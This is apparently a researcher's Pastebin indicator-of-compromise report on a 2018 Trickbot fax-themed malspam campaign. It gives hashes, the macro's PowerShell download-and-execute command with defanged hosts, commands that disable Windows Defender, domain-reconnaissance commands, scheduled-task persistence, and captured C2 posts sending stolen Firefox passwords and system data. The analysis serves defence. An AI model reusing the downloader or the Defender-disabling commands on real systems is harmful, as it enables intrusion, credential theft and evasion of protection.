SHARE
TWEET

#Trickbot_051018

VRad Oct 5th, 2018 (edited) 344 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #Trickbot #W97M #macro #powershell
  2.  
  3. https://pastebin.com/75KNqwCf
  4. https://radetskiy.wordpress.com/?s=trickbot
  5. https://myonlinesecurity.co.uk/trickbot-via-new-fax-message-malspam/
  6.  
  7. shema
  8. --------------
  9. email > attach (doc) > macro > powershell > GET 2URL > \AppData\Local\Temp\which.exe
  10.  
  11. email_headers
  12. --------------
  13. Received: from confidentialfax.com ([95.211.242.199])
  14.     by mail1.victim.com for <user1@org1.victim.com>;
  15.     Fri, 5 Oct 2018 13:45:12 +0300 (EEST) (envelope-from noreply-user1=org1.victim.com@confidentialfax.com)
  16. Received: by confidentialfax.com id hmt0jtcpsj86 for <user1@org1.victim.com>;
  17.     Fri, 5 Oct 2018 06:29:00 -0400 (envelope-from <noreply-user1=org1.victim.com@confidentialfax.com>)
  18. Subject:  New fax message
  19. From: "Confidential Fax" <noreply@confidentialfax.com>
  20. Date: Fri, 5 Oct 2018 06:29:00 -0400
  21. To: user1@org1.victim.com
  22.  
  23. files
  24. --------------
  25. SHA-256 03456acb1cd591086282e3356a2978cb95de1ed5d17c00ce982e391c92efdbd2
  26. File name   Fax.doc
  27. File size   63 KB
  28.  
  29. SHA-256 b769c3aff961c8a3db3884d5470560d1ba23f1d4d7ff062c899fca1d3829c30a
  30. File name   ch.rome     !This program cannot be run in DOS mode.
  31. File size   557.3 KB
  32.  
  33. SHA-256 6b58797cbdbe8afc9a93230bd8275202d88c94c10aa051721908ec31deea9c8c
  34. File name   radiance.png    !This program cannot be run in DOS mode.
  35. File size   492 KB
  36.  
  37. SHA-256 3558a4b7210b316afcd175c072b11bed5662296082b3d5c0a8b82c4d9a393f22
  38. File name   table.png   !This program cannot be run in DOS mode.
  39. File size   492 KB
  40.  
  41. macro
  42. --------------
  43. powershell "'powershell ""function need([string] $qqqqq){(new-object system.net.webclient).downloadfile($qqqqq,''C:\Users\admin\AppData\Local\Temp\which.exe'');start-process ''C:\Users\admin\AppData\Local\Temp\which.exe'';}try{need(''h11p: \pixandflix{.} com/ch.rome'')}catch{need(''h11p: \wedannouncements{.} com/ch.rome'')}'"" | out-file -encoding ascii -filepath C:\Users\admin\AppData\Local\Temp\symbol.bat; start-process 'C:\Users\admin\AppData\Local\Temp\symbol.bat' -windowstyle hidden"
  44.  
  45. payload_sources
  46. --------------
  47. 107.180.51.22   pixandflix{.} com/ch.rome
  48. 107.180.51.22   wedannouncements{.} com/ch.rome
  49.  
  50. activity
  51. **************
  52.  
  53. proc
  54. --------------
  55. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  56. C:\Windows\SysWOW64\cmd.exe /c powershell "'powershell ""function need([string] $qqqqq){(new-object system.net.webclient).downloadfile($qqqqq,''%tmp%\which.exe'');start-process ''%tmp%\which.exe'';}try{need(''h11p: \pixandflix{.} com/ch.rome'')}catch{need(''h11p: \wedannouncements{.} com/ch.rome'')}'"" | out-file -encoding ascii -filepath %tmp%\symbol.bat; start-process '%tmp%\symbol.bat' -windowstyle hidden"
  57. C:\Windows\SysWOW64\cmd.exe /c ""C:\tmp\symbol.bat" "
  58. "C:\tmp\which.exe"
  59. C:\Windows\SysWOW64\cmd.exe
  60. /c sc stop WinDefend
  61. /c sc delete WinDefend
  62. /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  63. C:\Users\operator\AppData\Roaming\AMNI\which.exe
  64. C:\Windows\SysWOW64\cmd.exe
  65. /c sc stop WinDefend
  66. /c sc delete WinDefend
  67. /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  68. C:\Windows\system32\svchost.exe
  69. C:\Windows\system32\cmd.exe
  70. /c ipconfig /all
  71. /c net config workstation
  72. /c net view /all
  73. /c net view /all /domain
  74. /c nltest /domain_trusts
  75. /c nltest /domain_trusts /all_trusts
  76. C:\Windows\system32\svchost.exe
  77.  
  78. netwrk
  79. --------------
  80. 107.180.51.22   pixandflix.com  GET /ch.rome        HTTP/1.1    no User Agent       !This program cannot be run in DOS mode.
  81. 185.17.123.2    185.17.123.2    GET /radiance.png   HTTP/1.1    no User Agent       !This program cannot be run in DOS mode.
  82. 185.17.123.2    185.17.123.2    GET /table.png      HTTP/1.1    WinHTTP loader/1.0  !This program cannot be run in DOS mode.
  83. 185.17.123.2    185.17.123.2    GET /table.png      HTTP/1.1    WinHTTP loader/1.0  !This program cannot be run in DOS mode.
  84. 37.128.229.30   37.128.229.30   POST /ser1005/APM11_W617601.idxxxxxx/81/    HTTP/1.1    Mozilla/4.0
  85. 37.128.229.30   37.128.229.30   POST /ser1005/APM11_W617601.idxxxxxx/81/    HTTP/1.1    Mozilla/4.0
  86. 37.128.229.30   37.128.229.30   POST /ser1005/APM11_W617601.idxxxxxx/90     HTTP/1.1    test
  87. 37.128.229.30   37.128.229.30   POST /ser1005/APM11_W617601.idxxxxxx/81/    TTP/1.1     Mozilla/4.0
  88.  
  89. comp
  90. --------------
  91. powershell.exe      1568    107.180.51.22   80  ESTABLISHED
  92. svchost.exe     2976    47.52.62.55 443 ESTABLISHED
  93. svchost.exe     2976    192.252.209.44  443 ESTABLISHED
  94. svchost.exe     2976    2.21.89.57  80  ESTABLISHED
  95. svchost.exe     2976    82.146.41.218   447 ESTABLISHED
  96. svchost.exe     3136    200.29.24.36    8082    SYN_SENT
  97. svchost.exe     3384    185.17.123.2    80  ESTABLISHED
  98. svchost.exe     3136    24.130.135.200  80  SYN_SENT
  99. svchost.exe     420 77.37.142.203   8082    SYN_SENT   
  100. svchost.exe     3136    177.0.69.68 80  SYN_SENT
  101. svchost.exe     3136    107.175.247.166 443 SYN_SENT
  102. svchost.exe     3136    172.81.135.139  443 SYN_SENT
  103. svchost.exe     3136    200.29.24.36    8082    SYN_SENT                           
  104.  
  105. persist
  106. --------------
  107. Task Scheduler
  108. \Msnetcs            c:\users\operator\appdata\roaming\amni\which.exe    05.10.2018 10:59
  109.  
  110. stealing_passwd
  111. **************
  112. POST /ser1005/APM11_W617601.idxxxxxx/81/ HTTP/1.1
  113. Accept: */*
  114. User-Agent: Mozilla/4.0
  115. Host: 37.128.229.30
  116. -----------DEAFJJDLMELQCBHP
  117. Content-Disposition: form-data; name="data"
  118.  
  119. http://www.i.ua|oper|****** (saved passwd)
  120. https://www.ukr.net|11oper|****** (saved passwd)
  121. https://accounts.google.com|oper11.wdma@gmail.com|****** (saved passwd)
  122. https://login.live.com|oper11.wdma@gmail.com|****** (saved passwd)
  123.  
  124. -----------DEAFJJDLMELQCBHP
  125. Content-Disposition: form-data; name="source"
  126.  
  127. firefox passwords
  128. -----------DEAFJJDLMELQCBHP--
  129.  
  130. (!) ff only, no chrome
  131.  
  132. get_sys_info
  133. **************
  134. POST /ser1005/APM11_W617601.595544C8808D034FD9E85B5C4F5C2BEB/90 HTTP/1.1
  135. Content-Type: multipart/form-data; boundary=Arasfjasu7
  136. User-Agent: test
  137. Host: 37.128.229.30
  138.  
  139. --Arasfjasu7
  140. Content-Disposition: form-data; name="proclist"
  141.  
  142.         ***PROCESS LIST***
  143.  
  144. [System Process]
  145. System
  146. smss.exe
  147. csrss.exe
  148. wininit.exe
  149. csrss.exe
  150. winlogon.exe
  151. . . .
  152.  
  153. --Arasfjasu7
  154. Content-Disposition: form-data; name="sysinfo"
  155.  
  156.         ***SYSTEMINFO***
  157.  
  158. Host Name - APM11
  159. OS Name - Microsoft Windows 7 ..........................
  160. OS Version - Service Pack 1
  161. OS Architecture - 64-bit
  162. Product Type - Workstation
  163. Build Type - Multiprocessor Free
  164. Registered Owner - operator
  165. Registered Organization -
  166. . . .
  167. /c ipconfig /all
  168. /c net config workstation
  169. /c net view /all
  170. /c net view /all /domain
  171. /c nltest /domain_trusts
  172. /c nltest /domain_trusts /all_trusts
  173.  
  174. # # #
  175. https://www.virustotal.com/#/file/03456acb1cd591086282e3356a2978cb95de1ed5d17c00ce982e391c92efdbd2/community
  176. https://www.virustotal.com/#/file/b769c3aff961c8a3db3884d5470560d1ba23f1d4d7ff062c899fca1d3829c30a/community
  177. https://www.virustotal.com/#/file/6b58797cbdbe8afc9a93230bd8275202d88c94c10aa051721908ec31deea9c8c/detection
  178. https://www.virustotal.com/#/file/3558a4b7210b316afcd175c072b11bed5662296082b3d5c0a8b82c4d9a393f22/detection
  179. https://analyze.intezer.com/#/analyses/0a02c369-9b18-4711-ba78-cb38aaed2184
  180. https://analyze.intezer.com/#/analyses/d2aea4cc-8c6c-4f60-80e1-e946b5f14f64
  181. https://analyze.intezer.com/#/analyses/7f767ab6-9865-441e-a9de-9bdd7c4c6bff
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top